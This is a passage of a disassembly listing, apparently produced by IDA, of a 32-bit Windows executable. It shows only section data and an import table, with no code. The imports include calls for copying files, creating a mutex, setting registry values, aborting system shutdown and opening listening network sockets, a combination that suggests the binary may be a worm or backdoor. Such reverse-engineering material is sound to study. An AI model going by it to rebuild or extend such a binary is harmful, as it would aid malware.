aLoadlibrarya_1 db 'LoadLibraryA',0
align 4
aGetprocaddress db 'GetProcAddress',0
align 4
dd 69560000h, 61757472h, 6C6C416Ch, 636Fh, 69560000h, 61757472h
dd 6572466Ch, 65h, 5Dh dup(0)
dd 380h dup(?)
_rsrc ends
; Section 3. (virtual address 00022000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00001000 ( 4096.)
; Offset to raw data for section: 0001EC00
; Flags E0000020: Text Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
_idata segment para public 'CODE' use32
assume cs:_idata
;org 422000h
assume es:nothing, ss:nothing, ds:_text, fs:nothing, gs:nothing
dd 22064h, 2 dup(0)
dd 22188h, 5000h, 22078h, 2 dup(0)
dd 221DCh, 5014h, 22144h, 2 dup(0)
dd 2250Ah, 50E0h, 2214Ch, 2 dup(0)
dd 22522h, 50E8h, 5 dup(0)
dd 22196h, 221AEh, 221BCh, 221CEh, 0
dd 221EAh, 221FAh, 22204h, 2220Eh, 22218h, 22222h, 2222Ah
dd 22234h, 2223Eh, 22254h, 22264h, 2226Eh, 2227Eh, 2228Eh
dd 2229Eh, 222AAh, 222C2h, 222D4h, 222E2h, 222F2h, 222FEh
dd 2230Ah, 22314h, 22320h, 22332h, 22344h, 2235Ah, 22366h
dd 22372h, 2237Eh, 2238Ch, 2239Ah, 223A8h, 223B6h, 223C6h
dd 223D6h, 223EAh, 223FCh, 2240Eh, 2241Ch, 2242Ah, 2243Eh
dd 22452h, 2246Eh, 22488h, 224A2h, 224B8h, 224D0h, 224EAh
dd 224FAh, 0
dd 22516h, 0
dd 2252Eh, 22538h, 22540h, 22548h, 22550h, 2255Ah, 22564h
dd 2256Eh, 2257Ch, 22588h, 22594h, 225A4h, 225B2h, 225BAh
dd 0
dd 61766461h, 32336970h, 6C6C642Eh, 0
aAbortsystems_0 db 'AbortSystemShutdownA',0
align 10h
aRegopenkeya_0 db 'RegOpenKeyA',0
dd 65520000h, 74655367h, 756C6156h, 41784565h, 0
aRegclosekey_1 db 'RegCloseKey',0
aKernel32_dll db 'kernel32.dll',0
align 4
aLoadlibrarya_2 db 'LoadLibraryA',0
align 4
aLstrcpy db 'lstrcpy',0
dd 6C5F0000h, 736F6C63h, 65h, 7277685Fh, 657469h, 6C5F0000h
dd 61657263h, 74h, 65656C53h, 70h, 6572685Fh, 6461h, 6C5F0000h
dd 6E65706Fh, 0
aGetmodulefilen db 'GetModuleFileNameA',0
align 4
dd 72430000h, 65746165h, 65726854h, 6461h, 69570000h, 6578456Eh
dd 63h, 4C746547h, 45747361h, 726F7272h, 0
aGettickcount db 'GetTickCount',0
align 10h
aCreatemutexa db 'CreateMutexA',0
align 10h
aCopyfilea db 'CopyFileA',0
align 4
aGetwindowsdire db 'GetWindowsDirectoryA',0
align 4
aGetprocaddre_0 db 'GetProcAddress',0
align 4
dd 65480000h, 65527061h, 6F6C6C41h, 63h, 74726956h, 416C6175h
dd 636F6C6Ch, 0
aHeapalloc db 'HeapAlloc',0
align 10h
aGetoemcp db 'GetOEMCP',0
align 4
aGetacp_0 db 'GetACP',0
align 4
dd 65470000h, 49504374h, 6F666Eh, 65470000h, 72745374h
dd 54676E69h, 57657079h, 0
aGetstringtypea db 'GetStringTypeA',0
align 4
dd 754D0000h, 4269746Ch, 54657479h, 6469576Fh, 61684365h
dd 72h, 74697257h, 6C694665h, 65h, 556C7452h, 6E69776Eh
dd 64h, 70616548h, 65657246h, 0
aVirtualfree_0 db 'VirtualFree',0
dd 65480000h, 72437061h, 65746165h, 0
aHeapdestroy db 'HeapDestroy',0
dd 65470000h, 6C694674h, 70795465h, 65h, 614D434Ch, 72745370h
dd 57676E69h, 0
aLcmapstringa db 'LCMapStringA',0
align 4
aGetmodulehan_1 db 'GetModuleHandleA',0
align 4
aGetstartupin_0 db 'GetStartupInfoA',0
dd 65470000h, 6D6F4374h, 646E616Dh, 656E694Ch, 41h, 56746547h
dd 69737265h, 6E6Fh, 78450000h, 72507469h, 7365636Fh, 73h
dd 6D726554h, 74616E69h, 6F725065h, 73736563h, 0
aGetcurrentpr_0 db 'GetCurrentProcess',0
align 4
aUnhandledexc_0 db 'UnhandledExceptionFilter',0
align 10h
aFreeenvironm_0 db 'FreeEnvironmentStringsA',0
dd 72460000h, 6E456565h, 6F726976h, 6E656D6Eh, 72745374h
dd 73676E69h, 57h, 65646957h, 72616843h, 754D6F54h, 4269746Ch
dd 657479h, 65470000h, 766E4574h, 6E6F7269h, 746E656Dh
dd 69727453h, 73676Eh, 65470000h, 766E4574h, 6E6F7269h
dd 746E656Dh, 69727453h, 5773676Eh, 0
aLockresource db 'LockResource',0
align 4
aGetstdhandle db 'GetStdHandle',0
align 2
aUser32_dll db 'user32.dll',0
align 4
aWsprintfa db 'wsprintfA',0
aWs2_32_dll db 'ws2_32.dll',0
align 10h
aAccept db 'accept',0
align 4
dd 65720000h, 7663h, 65730000h, 646Eh, 74680000h, 736E6Fh
dd 6F730000h, 74656B63h, 0
aConnect_0 db 'connect',0
dd 696C0000h, 6E657473h, 0
aGethostname db 'gethostname',0
dd 6E690000h, 6E5F7465h, 616F74h, 6E690000h, 615F7465h
dd 726464h, 65670000h, 736F6874h, 6E796274h, 656D61h, 53570000h
dd 61745341h, 70757472h, 0
aBind db 'bind',0
align 4
aClosesocket_0 db 'closesocket',0
align 1000h
_idata ends
end